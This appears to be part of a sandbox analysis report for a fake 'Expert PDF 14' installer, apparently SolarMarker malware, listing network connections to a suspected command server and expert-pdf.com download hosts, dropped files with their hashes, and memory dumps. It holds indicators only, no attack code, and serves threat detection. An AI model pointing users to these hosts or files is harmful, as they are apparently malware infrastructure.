ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 151.122.125.40.in-addr.arpa udp
US 104.208.16.90:443 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 tcp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
NL 84.53.175.11:80 tcp
US 8.8.8.8:53 210.81.184.52.in-addr.arpa udp
US 8.8.8.8:53 113.238.32.23.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 assets.msn.com udp
GB 95.101.143.120:443 assets.msn.com tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 120.143.101.95.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 download14.expert-pdf.com udp
CA 64.15.159.225:80 download14.expert-pdf.com tcp
CA 64.15.159.225:443 download14.expert-pdf.com tcp
US 8.8.8.8:53 redamex.expert-pdf.com udp
CA 64.15.159.204:443 redamex.expert-pdf.com tcp
CA 64.15.159.225:80 download14.expert-pdf.com tcp
CA 64.15.159.225:443 download14.expert-pdf.com tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 204.159.15.64.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp
ES 5.189.222.80:80 tcp

Files

memory/1644-133-0x0000000000400000-0x0000000000501000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-AB559.tmp\07d8c9f5-af55-421d-9023-7932ab1810d7.tmp

MD5 a95712856401dda069ee07c719bdb2ab
SHA1 73293e45116e0930d78087741016cde920922a74
SHA256 b4878d6b9d7462cafe81d20da148a44750aa707f4e34eae1f23f21f9e0d9afa0
SHA512 2ea973307830b193379a0b7698682bfecdfcc6bab685dcf60af1c23c94b16b862924148a2f9e8b2ac2b7734c3552193dc0459c7961ab8730b0282101fa22ff85

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

memory/3672-144-0x0000000002810000-0x0000000002811000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\Users\Admin\AppData\Local\Temp\is-48SRK.tmp\Expert_PDF.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

C:\ProgramData\Expert PDF 14\Installation\Expert_PDF_14_Installer.exe

MD5 440d4f0c478b77d0e1a95e8165dfb650
SHA1 d8cd10e080167a93273a6969b61648ce9b9debb2
SHA256 19834ba63fc5f104f81d991a93593acde4bb49c10883e66344b8797caf4a5462
SHA512 a8c0b99c9f7f64ad440dd640f5e00b471514fd322af565796dd8fac8b4aabb693ccbcf1698e7082a3e1e188ead68081db13197555ba6b1ff5ef1dbc7b32bbbc5

memory/1644-176-0x0000000000400000-0x0000000000501000-memory.dmp

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

C:\ProgramData\Expert PDF 14\Installation\Statistics.dll

MD5 e645ca01c01f9f8489c07a6b41fbd318
SHA1 3e8ea394f6605bd8529c58a143f01675adee371a
SHA256 a9145b41491019af4e89c5736c0d9d1fc83ab9786ec3dfb27da9be4e40cff27e
SHA512 c220bd620f03f38286899ed124abde69ed0812c2c1ef84031a02abd39faa4975255bc6a2bff8900d0294ac2f508344131be8cc6d8765aa46d430a135bb1af2b6

memory/1924-191-0x0000000000C70000-0x0000000000CA6000-memory.dmp

memory/1924-192-0x0000000004E20000-0x0000000005448000-memory.dmp

memory/3672-193-0x0000000000400000-0x0000000000723000-memory.dmp

memory/1924-197-0x00000000047E0000-0x00000000047F0000-memory.dmp

memory/4392-198-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/3676-196-0x0000000004520000-0x0000000004530000-memory.dmp

memory/4392-199-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/4252-200-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/3676-201-0x0000000004520000-0x0000000004530000-memory.dmp

memory/3080-202-0x0000000005610000-0x0000000005620000-memory.dmp

memory/1568-203-0x0000000003080000-0x0000000003090000-memory.dmp

memory/3080-204-0x0000000005980000-0x00000000059A2000-memory.dmp

memory/4392-206-0x0000000005D70000-0x0000000005DD6000-memory.dmp

memory/2492-205-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/4392-208-0x0000000005DE0000-0x0000000005E46000-memory.dmp

memory/980-209-0x0000000003240000-0x0000000003250000-memory.dmp

memory/980-207-0x0000000003240000-0x0000000003250000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_umbfj5me.3wd.psm1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3672-293-0x0000000000400000-0x0000000000723000-memory.dmp

memory/5020-303-0x0000000005230000-0x0000000005240000-memory.dmp

memory/2492-304-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/1644-306-0x0000000000400000-0x0000000000501000-memory.dmp

memory/3080-307-0x0000000006850000-0x000000000686E000-memory.dmp

C:\Users\Admin\d42bf9d5b6efb8ac6fe79a881e3d037e\f612d312080190743c333ce6f036a08b\774993c53916d2cabd3093113aba2438\4015a7944708b530fadfa1e4d3902c78\3e985328b31761cd84eaaa320cd28e3c\f104fb2467d873ac041bbbdffbb51cd0\61febf04862f7148e24a3df67bcbb2b8

MD5 9ad7347a02f60aa376133856f8618acb
SHA1 3377b9738c82647ff6f0fc741c58548fa8caaf31
SHA256 a4f9f4c9dfbe2e61dd8ebe5d1d9bd8a519d5a7833f2653820671a16b49855fea
SHA512 a912a3e881168ce1dc23d0c715323a7b02b0c522fd49f7da236d97f8cbb183c2d4bf2be97bac973dfba5852a607ad849e815afdd1c7f033bddafcc0303f18687

memory/5020-309-0x0000000005230000-0x0000000005240000-memory.dmp

memory/4392-310-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/2456-311-0x0000000002590000-0x00000000025A0000-memory.dmp

memory/1568-313-0x0000000003080000-0x0000000003090000-memory.dmp

memory/3676-312-0x0000000004520000-0x0000000004530000-memory.dmp

memory/3676-315-0x0000000005F30000-0x0000000005F4A000-memory.dmp

memory/5020-316-0x0000000006C90000-0x0000000006CB2000-memory.dmp

memory/4252-314-0x00000000074C0000-0x0000000007556000-memory.dmp

memory/4392-317-0x0000000007A10000-0x0000000007FB4000-memory.dmp

memory/4252-318-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/2492-319-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/5020-320-0x0000000008C40000-0x00000000092BA000-memory.dmp

memory/3676-321-0x0000000004520000-0x0000000004530000-memory.dmp

memory/3676-323-0x0000000004520000-0x0000000004530000-memory.dmp

memory/4392-322-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/1568-324-0x0000000003080000-0x0000000003090000-memory.dmp

memory/4252-326-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/4252-330-0x0000000002F20000-0x0000000002F30000-memory.dmp

C:\Users\Admin\AppData\Roaming\wGITVhmXWQSqpZKRCtElfrun\TesVNngiWXdzUEPmMOBYwhcAuCZyRfIktrSaKvjFpJQLGlxbHoDq

MD5 21fb2997c5f3ae724b68c0abe70d24dc
SHA1 a67e74c07b67c7b88260bc0b79d2306312f01b41
SHA256 8ffb8a0883f778a001250e734ec0d1ca8a3298a5c0bbcf413925f90d8e5f2fb2
SHA512 67cb54e8f0d0c0391cb9c60ec05b312f19e6934bd3affe9b08237d6932acd76b07a4a3075341cd153796211afd5fe3d684825ecfc49e17f2788b37df0bc0ad42

memory/1924-334-0x00000000047E0000-0x00000000047F0000-memory.dmp

memory/3080-335-0x0000000005610000-0x0000000005620000-memory.dmp

memory/1568-337-0x0000000003080000-0x0000000003090000-memory.dmp

memory/4392-328-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/980-340-0x0000000003240000-0x0000000003250000-memory.dmp

memory/2492-338-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/980-341-0x0000000003240000-0x0000000003250000-memory.dmp

memory/5020-359-0x0000000005230000-0x0000000005240000-memory.dmp

memory/2492-360-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/2456-362-0x0000000002590000-0x00000000025A0000-memory.dmp

C:\Users\Admin\appdata\roaming\solarmarker.dat

MD5 3afc886140acb1fb8adf64e7de31aaf3
SHA1 4045e92781bb6d0218ad556103bd7cf2744d471d
SHA256 cd7fe991a85849fdeca6d5891561672feb6f12b5d52fd5dc00b3c6d3e1754f9a
SHA512 14f5e327c64c49ccb4f2874766c587f23b87908fee260b1e265b501f115bbd5f2260554c6283dd6e6a0dc8b40d17d2a8f7bad220bdce332a78b9590a4faca826

memory/5020-369-0x0000000005230000-0x0000000005240000-memory.dmp

memory/4392-371-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/3676-373-0x0000000004520000-0x0000000004530000-memory.dmp

memory/2456-372-0x0000000002590000-0x00000000025A0000-memory.dmp

memory/1568-374-0x0000000003080000-0x0000000003090000-memory.dmp

memory/1924-375-0x00000000047E0000-0x00000000047F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4252-386-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/2492-387-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/980-388-0x0000000003240000-0x0000000003250000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6